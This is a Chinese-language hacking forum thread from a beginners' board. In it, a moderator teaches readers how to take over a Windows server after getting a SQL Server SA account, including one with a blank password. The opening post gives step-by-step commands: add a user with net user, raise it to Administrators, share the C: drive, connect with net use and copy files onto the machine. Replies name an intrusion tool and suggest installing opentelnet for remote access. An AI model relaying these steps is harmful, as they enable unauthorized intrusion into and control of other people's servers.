论坛: 菜鸟乐园 标题: 想成为黑客的菜鸟先到这来看看(基础篇:利用SQL入侵) 复制本贴地址    
作者: bking [bking]    版主   登录
当你获得了一台SQL Server的SA(管理员)账号后,可以通过他建立一个账号,并能把这个账号加入administrators组    方法: 1.用SQLEXEC登陆到服务器,建立一个账号:net user username password /add  加入Administrators组:net localgroup Administrator[color=red]s/color]  username /add 2.用刚才建立的username登陆系统:net use \\ip password /user:username 3.这时,你就可以通过 copy file \\ip\sharename 复制文件过去了!

当你获得了一台SQL Server的SA(非管理员)账号后,可以通过他建立一个账号,但并不能把这个账号加入administrators组,因此通过net use命令后,你并不可以把东东copy过去,这时,你可以通过: 1。用SQLEXEC登陆到服务器,建立一个账号:net user username password /add 2。用命令net share sharename=path,比如:net share cc=c:\来建立一个共享盘(注意:由于这时你的身份并非admin,所以下面可以访问了) 3。用刚才建立的username登陆系统:net use \\ip password /user:username 4。这时,你就可以通过 copy file \\ip\sharename 把文件复制过去!







[此贴被 新月峰岭(bking) 在 04月21日23时25分 编辑过]

地主 发表时间: 04/21 23:40
回复: best_lu [best_lu]   论坛用户   登录
thanks刚好需要

B1层 发表时间: 04/22 09:43
回复: qscy [qscy]   论坛用户   登录
老大,我用SOLEXEC连上去了,是SA空口令,可是没法用NET命令,根本加不了用户,连映射都用不了,只能用用CD、MKDIR等简单命令,我的机子是WIN98,是不是不行啊,还有什么好的方法教教小弟吧

B2层 发表时间: 04/22 17:05
回复: max_ax [max_ax]   论坛用户   登录
SQLEXEC
怎么连接啊??
是用工具还 是用命令啊?


B3层 发表时间: 04/22 18:20
回复: best_lu [best_lu]   论坛用户   登录
我也想知道,是工具吗?

B4层 发表时间: 04/22 20:12
回复: bking [bking]   版主   登录
是,去www.netsill.com.搜索supersql就能找到

B5层 发表时间: 04/22 21:54
回复: best_lu [best_lu]   论坛用户   登录
添加用户成功后,如何下一步行动。
试过telnet,ftp,不行。
要工具吗,还是有别的命令?

B6层 发表时间: 04/23 11:17
回复: miku [miku]   论坛用户   登录
以后多发表一些这样的文章啊!

B7层 发表时间: 04/23 14:03
回复: wjccn [wjccn]   论坛用户   登录
   好东西!

B8层 发表时间: 04/23 23:25
回复: bking [bking]   版主   登录
to best_lu 
  有了超级用户的权限,就可以去下载一个 opentelnet 来给他开个telnet端口,然后就可以telnet了

B9层 发表时间: 04/24 07:43
回复: truly [truly]   论坛用户   登录
如何和你联系?你有QQ吗?

B10层 发表时间: 04/24 08:27
回复: eidos [eidos]   论坛用户   登录
如果有SA空口令也可以用SqlExec.exe这个软件,很简单的,直接在命令行里加用户就行了

B11层 发表时间: 07/10 16:29
回复: vishx [vishx]   论坛用户   登录
都是一样的,只要掌握了NET命令就很好办了

B12层 发表时间: 07/10 19:26

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号